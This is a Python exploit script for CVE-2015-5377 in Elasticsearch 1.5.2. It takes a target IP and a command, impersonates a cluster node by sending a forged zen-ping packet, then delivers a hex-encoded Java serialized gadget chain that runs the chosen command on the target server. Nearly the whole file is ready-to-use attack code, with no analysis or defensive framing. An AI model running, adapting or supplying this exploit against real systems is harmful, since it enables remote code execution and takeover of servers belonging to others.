import socket
import struct
import requests
import time
import sys
import os
from signal import signal, SIGINT
from _thread import *

IP = ''
YOUR_IP = ''
COMMAND = ''

TCP_PORT = 9300
UDP_PORT = 54328

def banner():
    print("")
    print("+-----------------------------------------+")
    print("+             CVE-2015-5377               +")
    print("+          ELASTICSEARCH 1.5.2            +")
    print("+                 fi3ro                   +")
    print("+-----------------------------------------+")
    print("")


def print_usage():
    print("")
    print("+---------------------------------------------------+")
    print("+ USAGE: CVE-2015-5377.py SERVER_IP YOUR_IP COMMAND +")
    print("+---------------------------------------------------+")
    print("")
    exit()

def read_arg():
    global IP
    IP = sys.argv[1]
    global YOUR_IP
    YOUR_IP = sys.argv[2]
    global COMMAND
    COMMAND = sys.argv[3]

def handler(signal_received, frame):
    exit()

def get_cluster_name():
    r = requests.get('http://'+ IP + ':9200/_cluster/state?pretty')
    return r.json()['cluster_name']

def client(connection):
    while True:
        data = connection.recv(4096)
        b = bytearray(data)
        
        if not data:
            break

        TOKEN = b'\x45\x53'
        MESSAGE_LENGHT = b'\x00\x00\x07\xf2'
        REQUEST_ID = b[6:14]
        STATUS_FLAG = b'\x03'
        VERSION = b'\x00\x0f\xb8\x9b'

        DATA1 = b'\x05\x73\x72\x00\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x00\x2c\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x74\x65\x64\x43\x6c\x6f\x73\x75\x72\x65\x10\x23\x37\x19\xf7\x15\xdd\x1b\x02\x00\x01\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x00\x2d\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x73\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x10\x23\x37\x1a\xd6\x01\xbc\x1b\x02\x00\x02\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x68\x61\x6e\x64\x6c\x65\x43\x61\x63\x68\x65\x74\x00\x28\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x3b\x78\x70\x73\x72\x00\x00\x29\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x4d\x65\x74\x68\x6f\x64\x43\x6c\x6f\x73\x75\x72\x65\x8f\x10\x31\xac\xf5\x9c\xf2\xcc\x02\x00\x01\x4c\x00\x06\x6d\x65\x74\x68\x6f\x64\x71\x00\x7e\x00\x09\x78\x72\x00\x00\x13\x67\x72\x6f\x6f\x76\x79\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x6f\x73\x75\x72\x65\x3c\xa0\xc7\x66\x16\x12\x6c\x5a\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\x6d\x61\x78\x69\x6d\x75\x6d\x4e\x75\x6d\x62\x65\x72\x4f\x66\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x73\x49\x00\x0f\x72\x65\x73\x6f\x6c\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4c\x00\x03\x62\x63\x77\x74\x00\x3c\x4c\x6f\x72\x67\x2f\x63\x6f\x64\x65\x68\x61\x75\x73\x2f\x67\x72\x6f\x6f\x76\x79\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x63\x61\x6c\x6c\x73\x69\x74\x65\x2f\x42\x6f\x6f\x6c\x65\x61\x6e\x43\x6c\x6f\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3b\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x71\x00\x7e\x00\x0b\x4c\x00\x05\x6f\x77\x6e\x65\x72\x71\x00\x7e\x00\x0b\x5b\x00\x0e\x70\x61\x72\x61\x6d\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x0a\x74\x68\x69\x73\x4f\x62\x6a\x65\x63\x74\x71\x00\x7e\x00\x0b\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74'
        
        print("[+] Command is: " + COMMAND)
        c = COMMAND.encode('ascii')

        DATA2 = struct.pack('>h', len(c)) + c

        DATA3 = b'\x71\x00\x7e\x00\x13\x75\x72\x00\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x02\x76\x72\x00\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x76\x72\x00\x00\x0c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x46\x69\x6c\x65\x04\x2d\xa4\x45\x0e\x0d\xe4\xff\x03\x00\x01\x4c\x00\x04\x70\x61\x74\x68\x71\x00\x7e\x00\x09\x78\x70\x70\x74\x00\x07\x65\x78\x65\x63\x75\x74\x65\x73\x72\x00\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x78\x72\x00\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x78\x70\x73\x72\x00\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x78\x72\x00\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x78\x72\x00\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6e\x74\x72\x79\x53\x65\x74\x76\x72\x00\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70'

        MESSAGE_LENGHT = struct.pack('>i', len(REQUEST_ID+STATUS_FLAG+VERSION+DATA1+DATA2+DATA3))

        payload = TOKEN + MESSAGE_LENGHT + REQUEST_ID + STATUS_FLAG + VERSION + DATA1 + DATA2 + DATA3
        
        print("[+] Sending malicious payload with java serialized object...")

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((IP, TCP_PORT))
        s.sendall(payload)
        
        print("[+] Payload sent!")
        print("[!] EXIT")
        interrupt_main()
        break

    connection.close()
    exit()

def server():
    sock = socket.socket()
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    host = '0.0.0.0'

    try:
        sock.bind((host, TCP_PORT))
    except socket.error as e:
        print(str(e))

    print("[!] Spawned.")

    sock.listen(1000)

    while True:
        Client, address = sock.accept()
        start_new_thread(client, (Client, ))

    sock.close()

def zenping(cluster, ip):

    ZENPING_DATA1 = b'\x01\x09\x08\x04\xbb\x8d\x40\x00\x00\x00\x01'

    c = cluster.encode('ascii')
    length = chr(len(c))
    CLUSTER_DATA = struct.pack('>c', length.encode('ascii')) + c
    
    ZENPING_DATA2 = b'\x09\x65\x73\x2d\x6e\x6f\x64\x65\x2d\x31\x16\x4a\x2d\x59\x4e\x39\x72\x73\x55\x53\x62\x57\x2d\x5f\x6e\x4e\x2d\x61\x4d\x35\x55\x55\x67\x06\x75\x62\x75\x6e\x74\x75\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x01\x00\x04'
    
    IP_DATA = bytes(map(int, ip.split('.')))

    ZENPING_DATA3 = b'\x00\x00\x24\x54\x00\xbb\x8d\x40'

    ZENPING = ZENPING_DATA1 + CLUSTER_DATA + ZENPING_DATA2 + IP_DATA + ZENPING_DATA3

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(ZENPING, (IP, UDP_PORT))

    print("[!] Sent. ")



def main():

    if (len(sys.argv)<4):
        print_usage()
    
    banner()

    read_arg()
    signal(SIGINT, handler)
	
    print("[+] Getting the clustername from the elasticsearch server...")
    cluster = get_cluster_name()
    print("[+] Clustername: " + cluster)

    print("[+] Spawning a fake elasticsearch node...")
    start_new_thread(server, ())

    time.sleep(4)

    print("[+] Sending zenping to start the exploit... ")
    zenping(cluster, YOUR_IP)
    
    while 1:
        pass


if __name__ == "__main__":
    main()